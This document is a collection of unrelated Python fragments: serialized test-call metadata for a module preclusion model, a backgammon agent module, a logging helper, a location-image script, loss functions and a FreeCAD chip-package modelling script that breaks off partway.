(['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (5171, 5219), False, 'from components import model\n'), ((5312, 5385), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (5333, 5385), False, 'from components import model\n'), ((5399, 5422), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (5410, 5422), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((5452, 5495), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (5472, 5495), False, 'from components import model\n'), ((5508, 5546), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (5519, 5546), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((5607, 5666), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude2_code', 'preclude_info[0][0]'], {}), '(self.test_preclude2_code, preclude_info[0][0])\n', (5619, 5666), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((5680, 5731), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (5708, 5731), False, 'from components import model\n'), ((5761, 5804), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (5781, 5804), False, 'from components import model\n'), ((6173, 6246), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (6194, 6246), False, 'from components import model\n'), ((6260, 6283), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (6271, 6283), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((6313, 6356), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (6333, 6356), False, 'from components import model\n'), ((6370, 6408), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (6381, 6408), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((6676, 6744), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (6696, 6744), False, 'from components import model\n'), ((6813, 6886), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (6834, 6886), False, 'from components import model\n'), ((6900, 6923), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (6911, 6923), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((6953, 6996), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (6973, 6996), False, 'from components import model\n'), ((7009, 7047), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (7020, 7047), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7554, 7627), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (7575, 7627), False, 'from components import model\n'), ((7640, 7663), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (7651, 7663), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7693, 7736), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (7713, 7736), False, 'from components import model\n'), ((7750, 7788), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (7761, 7788), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7849, 7907), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (7861, 7907), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7920, 7979), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude2_code', 'preclude_info[1][0]'], {}), '(self.test_preclude2_code, preclude_info[1][0])\n', (7932, 7979), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((7992, 8051), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude3_code', 'preclude_info[2][0]'], {}), '(self.test_preclude3_code, preclude_info[2][0])\n', (8004, 8051), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((8065, 8116), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (8093, 8116), False, 'from components import model\n'), ((8146, 8189), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (8166, 8189), False, 'from components import model\n'), ((8475, 8543), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (8495, 8543), False, 'from components import model\n'), ((8731, 8804), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (8752, 8804), False, 'from components import model\n'), ((8817, 8840), 'nose.tools.assert_true', 'assert_true', (['outcome[0]'], {}), '(outcome[0])\n', (8828, 8840), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((8870, 8913), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (8890, 8913), False, 'from components import model\n'), ((8927, 8965), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (8938, 8965), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((9026, 9084), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (9038, 9084), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((9097, 9156), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude2_code', 'preclude_info[1][0]'], {}), '(self.test_preclude2_code, preclude_info[1][0])\n', (9109, 9156), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((9169, 9228), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude3_code', 'preclude_info[2][0]'], {}), '(self.test_preclude3_code, preclude_info[2][0])\n', (9181, 9228), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((9242, 9293), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (9270, 9293), False, 'from components import model\n'), ((9323, 9366), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (9343, 9366), False, 'from components import model\n'), ((9710, 9778), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (9730, 9778), False, 'from components import model\n'), ((9941, 10014), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (9962, 10014), False, 'from components import model\n'), ((10027, 10051), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (10039, 10051), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((10145, 10239), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_preclude2_code, self.ERROR_MSG_MODULE_DUPLICATED]'], {}), '(error_list[0], [self.test_preclude2_code, self.\n ERROR_MSG_MODULE_DUPLICATED])\n', (10157, 10239), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((10289, 10332), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (10309, 10332), False, 'from components import model\n'), ((10346, 10384), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (10357, 10384), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((10397, 10455), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (10409, 10455), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((10469, 10520), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (10497, 10520), False, 'from components import model\n'), ((10550, 10593), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (10570, 10593), False, 'from components import model\n'), ((10929, 10997), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (10949, 10997), False, 'from components import model\n'), ((11165, 11238), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (11186, 11238), False, 'from components import model\n'), ((11251, 11275), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (11263, 11275), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((11369, 11470), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST]'], {}), '(error_list[0], [self.test_invalid_module_code, self.\n ERROR_MSG_MODULE_DOESNT_EXIST])\n', (11381, 11470), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((11520, 11563), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (11540, 11563), False, 'from components import model\n'), ((11577, 11615), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (11588, 11615), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((11628, 11686), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (11640, 11686), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((11700, 11751), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (11728, 11751), False, 'from components import model\n'), ((11781, 11824), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (11801, 11824), False, 'from components import model\n'), ((11920, 11988), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (11940, 11988), False, 'from components import model\n'), ((12156, 12229), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (12177, 12229), False, 'from components import model\n'), ((12242, 12266), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (12254, 12266), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((12360, 12461), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST]'], {}), '(error_list[0], [self.test_invalid_module_code, self.\n ERROR_MSG_MODULE_DOESNT_EXIST])\n', (12372, 12461), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((12511, 12554), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (12531, 12554), False, 'from components import model\n'), ((12568, 12606), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (12579, 12606), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((12619, 12677), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (12631, 12677), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((12691, 12742), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (12719, 12742), False, 'from components import model\n'), ((12772, 12815), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (12792, 12815), False, 'from components import model\n'), ((13212, 13285), 'components.model.add_prerequisite', 'model.add_prerequisite', (['self.test_module_code', 'self.test_preclude_code', '(0)'], {}), '(self.test_module_code, self.test_preclude_code, 0)\n', (13234, 13285), False, 'from components import model\n'), ((13413, 13486), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (13434, 13486), False, 'from components import model\n'), ((13499, 13523), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (13511, 13523), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((13617, 13725), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_preclude_code, self.ERROR_MSG_MODULE_PRECLUSION_ALREADY_PREREQ]'], {}), '(error_list[0], [self.test_preclude_code, self.\n ERROR_MSG_MODULE_PRECLUSION_ALREADY_PREREQ])\n', (13629, 13725), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((13775, 13818), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (13795, 13818), False, 'from components import model\n'), ((13832, 13870), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (13843, 13870), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((13933, 13986), 'components.model.delete_all_prerequisites', 'model.delete_all_prerequisites', (['self.test_module_code'], {}), '(self.test_module_code)\n', (13963, 13986), False, 'from components import model\n'), ((14013, 14058), 'components.model.get_prerequisite', 'model.get_prerequisite', (['self.test_module_code'], {}), '(self.test_module_code)\n', (14035, 14058), False, 'from components import model\n'), ((14402, 14470), 'components.model.add_preclusion', 'model.add_preclusion', (['self.test_module_code', 'self.test_preclude_code'], {}), '(self.test_module_code, self.test_preclude_code)\n', (14422, 14470), False, 'from components import model\n'), ((14635, 14708), 'components.model.edit_preclusion', 'model.edit_preclusion', (['self.test_module_code', 'preclude_units_to_change_to'], {}), '(self.test_module_code, preclude_units_to_change_to)\n', (14656, 14708), False, 'from components import model\n'), ((14721, 14745), 'nose.tools.assert_false', 'assert_false', (['outcome[0]'], {}), '(outcome[0])\n', (14733, 14745), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((14839, 14936), 'nose.tools.assert_equal', 'assert_equal', (['error_list[0]', '[self.test_module_code, self.ERROR_MSG_MODULE_CANNOT_BE_ITSELF]'], {}), '(error_list[0], [self.test_module_code, self.\n ERROR_MSG_MODULE_CANNOT_BE_ITSELF])\n', (14851, 14936), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((14969, 15070), 'nose.tools.assert_equal', 'assert_equal', (['error_list[1]', '[self.test_invalid_module_code, self.ERROR_MSG_MODULE_DOESNT_EXIST]'], {}), '(error_list[1], [self.test_invalid_module_code, self.\n ERROR_MSG_MODULE_DOESNT_EXIST])\n', (14981, 15070), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((15120, 15163), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (15140, 15163), False, 'from components import model\n'), ((15177, 15215), 'nose.tools.assert_true', 'assert_true', (['(preclude_info is not None)'], {}), '(preclude_info is not None)\n', (15188, 15215), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((15228, 15286), 'nose.tools.assert_equal', 'assert_equal', (['self.test_preclude_code', 'preclude_info[0][0]'], {}), '(self.test_preclude_code, preclude_info[0][0])\n', (15240, 15286), False, 'from nose.tools import assert_equal, assert_false, assert_true\n'), ((15300, 15351), 'components.model.delete_all_preclusions', 'model.delete_all_preclusions', (['self.test_module_code'], {}), '(self.test_module_code)\n', (15328, 15351), False, 'from components import model\n'), ((15381, 15424), 'components.model.get_preclusion', 'model.get_preclusion', (['self.test_module_code'], {}), '(self.test_module_code)\n', (15401, 15424), False, 'from components import model\n')] |
import asyncio
import json
import multiprocessing
import random
from functools import partial
from typing import Set, Callable, List, Iterator
import numpy as np
import torch
from torch import nn
import backgammon.game as bg
class RandomAgent(bg.Agent):
"""Random Player."""
def get_action(self, available_moves: List[bg.Moves], board: bg.Board) -> bg.Moves:
return random.choice(list(available_moves))
class NNAgent(bg.Agent):
"""Neural network player."""
def __init__(self, model: nn.Module) -> None:
self.model = model
"""Model, which can predict a quality of state."""
def extract_features(self, board: bg.Board) -> torch.Tensor:
"""Create feature to insert in model.
Generate array of 720 features, 15 features for every position and same for opponent.
"""
def get_features(columns: bg.ColumnCheckersNumber) -> np.ndarray:
features = np.zeros(board.NUM_COLS * board.NUM_CHECKERS)
for col in range(board.NUM_COLS):
if col in columns:
start = col * board.NUM_CHECKERS
end = start + columns[col]
features[start:end] = 1
return features
columns, opp_columns = board.to_schema()
features = np.concatenate((get_features(columns), get_features(opp_columns)))
return torch.from_numpy(features).float().cuda()
def estimate_moves(self, available_moves: List[bg.Moves], board: bg.Board) -> Iterator[float]:
"""Estimate resulting board position for all passed moves."""
for moves in available_moves:
with board.temp_move(*moves) as temp_board:
v = self.estimate(temp_board)
yield v
def get_action(self, available_moves: List[bg.Moves], board: bg.Board) -> bg.Moves:
"""Find and return best action."""
available_moves = list(available_moves)
estimated_moves = list(self.estimate_moves(available_moves, board))
index_max = int(np.argmin(estimated_moves))
return available_moves[index_max]
def estimate(self, board):
"""Get a value of specified position."""
features = self.extract_features(board)
v = self.model(features)
return v
def __repr__(self):
return f'{self.__class__.__name__}[model={self.model}]'
@classmethod
def with_model_constructor(cls, model: nn.Module) -> Callable[[], 'NNAgent']:
"""
Create a child of current class with specified model.
:param model: torch model
:return: NNAgent class with specified model
"""
return partial(cls, model=model)
class TCPAgent(bg.Agent):
def get_action(self, available_moves: List[bg.Moves], board: bg.Board) -> bg.Moves:
"""Send a message to the server, wait an answer and use it."""
async def tcp_echo_client(message):
reader, writer = await asyncio.open_connection(self.host, self.port)
writer.write(message.encode())
data = await reader.read(100000)
writer.close()
return json.loads(data.decode())
message = json.dumps(dict(available_moves=available_moves, board=board.to_schema()))
done = asyncio.run(tcp_echo_client(message))
return done
def __init__(self, host: str = None, port: int = None, agent_name: str = None):
self.host = host
self.port = port
self.agent_name = agent_name
def __repr__(self):
information = ''
if self.host:
information += f'[{self.host}]'
if self.port:
information += f'[:{self.port}]'
if self.agent_name:
information += f'[{self.agent_name}]'
return f'{self.__class__.__name__}{information}'
@classmethod
def with_server(
cls,
agent_initializer: Callable[[], bg.Agent],
port: int = None, host: str = None
) -> 'TCPAgent':
"""Run server in child process, return insta"""
if not host and not port:
raise ValueError('Should specified at least host or port.')
pipe = multiprocessing.Pipe(False)
proc = multiprocessing.Process(
target=cls._server_runner,
args=(agent_initializer,),
kwargs=dict(port=port, host=host, pipe=pipe)
)
proc.start()
pipe_out, _ = pipe
agent_name = pipe_out.recv()
return cls(
host=host, port=port, agent_name=agent_name
)
@classmethod
def _server_runner(
cls,
agent_initializer: Callable[[], bg.Agent],
host: str = None,
port: int = None,
pipe: multiprocessing.Pipe = None
) -> None:
"""Create a TCP server, which can receive board and available values and select an action.
:param agent_initializer: function to initialize Agent. Do not pass Agent instance directly, because there are
situations, where we should generate it already in another process.
:param host: host
:param port: port
:param pipe: Pipe. Send name of created agent, if specified.
"""
async def handle(reader, writer):
data = await reader.read(100000)
message = json.loads(data.decode())
move = agent.get_action(
available_moves=message['available_moves'],
board=bg.Board.from_schema(*message['board'])
)
writer.write(json.dumps(move).encode())
await writer.drain()
writer.close()
async def run_server():
server = await asyncio.start_server(handle, host, port)
async with server:
await server.serve_forever()
agent = agent_initializer()
if pipe:
_, pipe_in = pipe
pipe_in.send(str(agent))
asyncio.run(run_server())
| [
"backgammon.game.Board.from_schema",
"asyncio.start_server",
"json.dumps",
"torch.from_numpy",
"numpy.zeros",
"asyncio.open_connection",
"functools.partial",
"numpy.argmin",
"multiprocessing.Pipe"
] | [((2669, 2694), 'functools.partial', 'partial', (['cls'], {'model': 'model'}), '(cls, model=model)\n', (2676, 2694), False, 'from functools import partial\n'), ((4171, 4198), 'multiprocessing.Pipe', 'multiprocessing.Pipe', (['(False)'], {}), '(False)\n', (4191, 4198), False, 'import multiprocessing\n'), ((937, 982), 'numpy.zeros', 'np.zeros', (['(board.NUM_COLS * board.NUM_CHECKERS)'], {}), '(board.NUM_COLS * board.NUM_CHECKERS)\n', (945, 982), True, 'import numpy as np\n'), ((2043, 2069), 'numpy.argmin', 'np.argmin', (['estimated_moves'], {}), '(estimated_moves)\n', (2052, 2069), True, 'import numpy as np\n'), ((2962, 3007), 'asyncio.open_connection', 'asyncio.open_connection', (['self.host', 'self.port'], {}), '(self.host, self.port)\n', (2985, 3007), False, 'import asyncio\n'), ((5681, 5721), 'asyncio.start_server', 'asyncio.start_server', (['handle', 'host', 'port'], {}), '(handle, host, port)\n', (5701, 5721), False, 'import asyncio\n'), ((5455, 5494), 'backgammon.game.Board.from_schema', 'bg.Board.from_schema', (["*message['board']"], {}), "(*message['board'])\n", (5475, 5494), True, 'import backgammon.game as bg\n'), ((1387, 1413), 'torch.from_numpy', 'torch.from_numpy', (['features'], {}), '(features)\n', (1403, 1413), False, 'import torch\n'), ((5534, 5550), 'json.dumps', 'json.dumps', (['move'], {}), '(move)\n', (5544, 5550), False, 'import json\n')] |
"""
Provides the molior python logging wrapper.
"""
import logging
import logging.config
from pathlib import Path
import yaml
LOGGING_CFG_FILE = Path("/etc/molior/logging.yml")
def init_logger():
"""
Initializes logger
"""
if LOGGING_CFG_FILE.exists():
with LOGGING_CFG_FILE.open() as log_cfg:
try:
logging.config.dictConfig(yaml.load(log_cfg))
except (yaml.scanner.ScannerError, ValueError):
logging.getLogger().critical(
"Config file '%s' corrupt", LOGGING_CFG_FILE
)
def get_logger(name="molior"):
"""
Returns a configured molior logger.
Returns:
logging.Logger: The molior logger.
"""
init_logger()
return logging.getLogger(name)
| [
"logging.getLogger",
"yaml.load",
"pathlib.Path"
] | [((146, 177), 'pathlib.Path', 'Path', (['"""/etc/molior/logging.yml"""'], {}), "('/etc/molior/logging.yml')\n", (150, 177), False, 'from pathlib import Path\n'), ((764, 787), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (781, 787), False, 'import logging\n'), ((380, 398), 'yaml.load', 'yaml.load', (['log_cfg'], {}), '(log_cfg)\n', (389, 398), False, 'import yaml\n'), ((476, 495), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (493, 495), False, 'import logging\n')] |
#!/usr/bin/env python3
import json
import base64
import requests
import random
def print_template(name):
if any(exclusion in name for exclusion in exclusions):
return
if random.randint(1, 3) == 1: # 1 of 3 should have a picture
base64image = try_get_an_image(name)
else:
base64image = ""
output = f"{name};{base64image}"
print(output)
def try_get_an_image(name):
# placeholder until maybe replaced by a real search
x = random.randint(200, 500)
y = random.randint(100, 300)
url = f"https://picsum.photos/{x}/{y}"
return base64.b64encode(requests.get(url).content).decode('ascii')
exclusions = ["To ", "Outside ", "Away ", " to ", "Near ", " of "]
locations_file = open("locations.json")
j = json.load(locations_file)
ldict = {}
for region in j["regions"]:
name = region["location"]
ldict[name] = name
for subregion in region["subLocation"]:
if subregion != "":
ldict[subregion] = subregion
for location in ldict:
print_template(ldict[location]) | [
"json.load",
"random.randint",
"requests.get"
] | [((765, 790), 'json.load', 'json.load', (['locations_file'], {}), '(locations_file)\n', (774, 790), False, 'import json\n'), ((477, 501), 'random.randint', 'random.randint', (['(200)', '(500)'], {}), '(200, 500)\n', (491, 501), False, 'import random\n'), ((510, 534), 'random.randint', 'random.randint', (['(100)', '(300)'], {}), '(100, 300)\n', (524, 534), False, 'import random\n'), ((192, 212), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (206, 212), False, 'import random\n'), ((606, 623), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (618, 623), False, 'import requests\n')] |
import numpy as np
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def log_loss(x, y, eps=1e-6):
x = np.clip(x, eps, 1-eps)
return -(y*np.log(x) + (1-y)*np.log(1-x)) | [
"numpy.clip",
"numpy.exp",
"numpy.log"
] | [((109, 133), 'numpy.clip', 'np.clip', (['x', 'eps', '(1 - eps)'], {}), '(x, eps, 1 - eps)\n', (116, 133), True, 'import numpy as np\n'), ((57, 67), 'numpy.exp', 'np.exp', (['(-x)'], {}), '(-x)\n', (63, 67), True, 'import numpy as np\n'), ((147, 156), 'numpy.log', 'np.log', (['x'], {}), '(x)\n', (153, 156), True, 'import numpy as np\n'), ((165, 178), 'numpy.log', 'np.log', (['(1 - x)'], {}), '(1 - x)\n', (171, 178), True, 'import numpy as np\n')] |
from __future__ import print_function
import sys
sys.path.append('/usr/lib/freecad/lib')
print(sys.path)
import FreeCAD
import ImportGui
import FreeCADGui
import os
import Draft
# FIXME assumes standoff of 0.5mm
# all distances in mm
MMTOMIL = 0.3937
directory = sys.argv[2]; name = sys.argv[3]; pitch = float(sys.argv[4])
nHorizontalPins = int(sys.argv[5]); nVerticalPins = int(sys.argv[6])
sizePinx = float(sys.argv[7]); sizePiny = float(sys.argv[8]); sizePinz = float(sys.argv[9]);
length = float(sys.argv[10]); width = float(sys.argv[11])
height = float(sys.argv[12])
mode = 'QFP'
if len(sys.argv) > 13:
mode = 'QFN'
sizeEpadx = float(sys.argv[13])
sizeEpady = float(sys.argv[14])
# go in sketch mode
Gui.activateWorkbench("SketcherWorkbench")
# create doc
App.newDocument()
App.setActiveDocument("Unnamed")
App.ActiveDocument=App.getDocument("Unnamed")
Gui.ActiveDocument=Gui.getDocument("Unnamed")
# create sketch
App.activeDocument().addObject('Sketcher::SketchObject','Sketch')
App.activeDocument().Sketch.Placement = App.Placement(
App.Vector(0.0, 0.0, 0.05),
App.Rotation(0.0, 0.0, 0.0, 1.0))
Gui.activeDocument().setEdit('Sketch')
# trace rectangle
App.ActiveDocument.Sketch.addGeometry(Part.Line(
App.Vector(width/2.0, -length/2.0, 0),
App.Vector(-width/2.0, -length/2.0, 0)))
App.ActiveDocument.Sketch.addGeometry(Part.Line(
App.Vector(-width/2.0, -length/2.0, 0),
App.Vector(-width/2.0, length/2.0, 0)))
App.ActiveDocument.Sketch.addGeometry(Part.Line(
App.Vector(-width/2.0, length/2.0, 0),
App.Vector(width/2.0, length/2.0, 0)))
App.ActiveDocument.Sketch.addGeometry(Part.Line(
App.Vector(width/2.0, length/2.0, 0),
App.Vector(width/2.0, -length/2.0, 0)))
App.ActiveDocument.recompute()
Gui.getDocument('Unnamed').resetEdit()
App.getDocument('Unnamed').recompute()
# create pad from sketch
Gui.activateWorkbench("PartDesignWorkbench")
App.activeDocument().addObject("PartDesign::Pad","Pad")
App.activeDocument().Pad.Sketch = App.activeDocument().Sketch
App.activeDocument().Pad.Length = height
App.ActiveDocument.recompute()
Gui.activeDocument().hide("Sketch")
# change pad color to black
Gui.getDocument("Unnamed").getObject("Pad").ShapeColor = (0.00,0.00,0.00)
Gui.getDocument("Unnamed").getObject("Pad").Visibility=False #Hide pad
# Add Cylinder
Gui.activateWorkbench("PartWorkbench")
App.ActiveDocument.addObject("Part::Cylinder","Cylinder")
FreeCAD.getDocument("Unnamed").getObject("Cylinder").Radius = sizePinx/2.
FreeCAD.getDocument("Unnamed").getObject("Cylinder").Height = height
FreeCAD.getDocument("Unnamed").getObject("Cylinder").Placement = App.Placement(
App.Vector(-width/2.0 + 2*sizePinx, length/2.0 - 1 + 2 * sizePinx, 0.1),
App.Rotation(0,0,0,1))
App.ActiveDocument.recompute()
# Pin Creation
App.ActiveDocument.addObject("Part::Box","HorizontalPin")
App.ActiveDocument.recompute()
FreeCAD.getDocument("Unnamed").getObject("HorizontalPin").Length = sizePinx
FreeCAD.getDocument("Unnamed").getObject("HorizontalPin").Width = sizePiny
FreeCAD.getDocument("Unnamed").getObject("HorizontalPin").Height = sizePinz
App.ActiveDocument.recompute()
# Horizontal pin Array creation
Gui.activateWorkbench("ArchWorkbench")
Draft.array(
App.getDocument("Unnamed").getObject("HorizontalPin"),
App.Vector(pitch, 0, 0), App.Vector(0, width-sizePiny, 0), nHorizontalPins, 2)
Gui.activateWorkbench("PartWorkbench")
shapesToFuse=[]
for obj in FreeCAD.ActiveDocument.Objects:
if obj.Name.find("HorizontalPin") != -1:
Gui.Selection.addSelection(obj)
shapesToFuse.append(obj)
App.activeDocument().addObject("Part::MultiFuse","HorizontalFusion")
App.activeDocument().HorizontalFusion.Shapes = shapesToFuse
App.ActiveDocument.recompute()
fuse = FreeCAD.ActiveDocument.getObject("HorizontalFusion")
fuse.Placement = App.Placement(
App.Vector(-((nHorizontalPins-1) * pitch / 2.0 + sizePinx / 2.), -length / 2., 0),
App.Rotation(0,0,0,1))
# Vertical pin Array creation
# Pin Creation
App.ActiveDocument.addObject("Part::Box","VerticalPin")
App.ActiveDocument.recompute()
FreeCAD.getDocument("Unnamed").getObject("VerticalPin").Length = sizePiny
FreeCAD.getDocument("Unnamed").getObject("VerticalPin").Width = sizePinx
FreeCAD.getDocument("Unnamed").getObject("VerticalPin").Height = sizePinz
App.ActiveDocument.recompute()
